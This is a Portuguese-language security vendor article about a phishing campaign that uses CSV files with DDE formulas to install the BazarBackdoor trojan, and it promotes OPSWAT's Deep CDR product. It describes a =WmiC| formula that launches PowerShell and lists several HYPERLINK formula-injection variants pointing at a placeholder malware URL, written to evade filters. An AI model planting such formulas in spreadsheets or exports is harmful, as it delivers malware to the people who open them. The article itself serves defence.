Uma nova campanha de phishing usando arquivos de texto CSV (valores separados por vírgula) especialmente criados para infectar os dispositivos dos usuários com o trojan BazarBackdoor foi detectada pelo pesquisador de malware Chris Campbell.
VEJA TAMBÉM: Um arquivo de vídeo pode conter um vírus?
Arquivos CSV são utilizados frequentemente para trocar dados simples entre bancos de dados e aplicativos. Como esse tipo de arquivo só contém texto sem código executável, muitos usuários pensam que é inofensivo e abrem o documento. Eles não suspeitam que o arquivo possa ser um vetor de ameaça através do qual um malware pode entrar em seus dispositivos se o arquivo CSV for aberto com aplicativos que suportam Dynamic Data Exchange (DDE), como Microsoft Excel e OpenOffice Calc. Esses aplicativos podem executar fórmulas e funções no arquivo CSV.
Os criminosos cibernéticos utilizam o recurso DDE para executar comandos arbitrários, que baixam e instalam o trojan BazarBackdoor, para comprometer e obter acesso total às redes corporativas das vítimas. Em comparação com outras abordagens de ataque populares com macros maliciosas ou códigos VBA ocultos em arquivo do MS Office, as ameaças ocultas em documentos DDE são mais difíceis de detectar.
Examinando cuidadosamente o arquivo, podemos ver um comando =WmiC| (Comando da Interface de Gerenciamento do Windows) contido em uma das colunas de dados. Se as vítimas permitirem inadvertidamente que essa função DDE seja executada, ela criará um comando do PowerShell. Os comandos abrirão uma URL remota para baixar um BazarLoader e o BazarBackdoor será instalado na máquina da vítima.
Como Deep CDR da OPSWAT ajuda você a se defender contra ataques DDE?
Você pode proteger sua rede contra essas sofisticadas campanhas de phishing limpando arquivos anexados em e-mails antes que eles cheguem a seus usuários. Com a mentalidade de que cada arquivo apresenta uma ameaça potencial e com foco na prevenção em vez de uma simples detecção, o Deep CDR remove todo o conteúdo ativo dos arquivos, mantendo a mesma usabilidade e funcionalidade do arquivo. O Deep CDR é uma das seis tecnologias-chave do MetaDefender, uma plataforma avançada de prevenção de ameaças da OPSWAT que realmente abraça a metodologia de segurança Zero Trust.
Você pode ver abaixo detalhes de higienização após o processamento do arquivo CSV infectado com o MetaDefender Core. O Deep CDR neutraliza a fórmula no arquivo para que nenhum comando PowerShell fosse criado, impedindo o download do malware.
Em ataques semelhantes, os hackers usam fórmulas mais complexas para evitar a detecção. Normalmente, as fórmulas no MS Excel começam com um sinal de igual (=). No entanto, como este aplicativo também aceita fórmulas que começam com um sinal diferente, como “=+” ou “@”, em vez de apenas “=”, a fórmula destrutiva em arquivos CSV pode ser:
=+HYPERLINK("<malware URL>")
=-HYPERLINK("<malware URL>")
=@HYPERLINK("<malware URL>")
+@HYPERLINK("<malware URL>")
-@HYPERLINK("<malware URL>")
Esses tipos de fórmulas podem enganar alguns sistemas CDR comuns. No entanto, o OPSWAT Deep CDR pode lidar facilmente com essa tática e produzir arquivos limpos e seguros para consumo, neutralizando a ameaça.
Além disso, a tecnologia OPSWAT MetaDefender Multiscanning utiliza mais de 35 mecanismos antimalware e melhora significativamente a detecção de ameaças conhecidas e desconhecidas (Zero Day).
Fonte: OPSWAT
Descubra nuestras soluciones avanzadas, robustas y seguras para NOC & SOC, Zero Trust, Next-Gen Firewalls, LGPD, Hardware, Monitoramento de Rede, Transferência de Arquivos Gerenciada, Consultoria de TIC, Treinamentos, Sustentação de Aplicações, Outsourcing, Licenciamento Geral e Help Desk.
Comments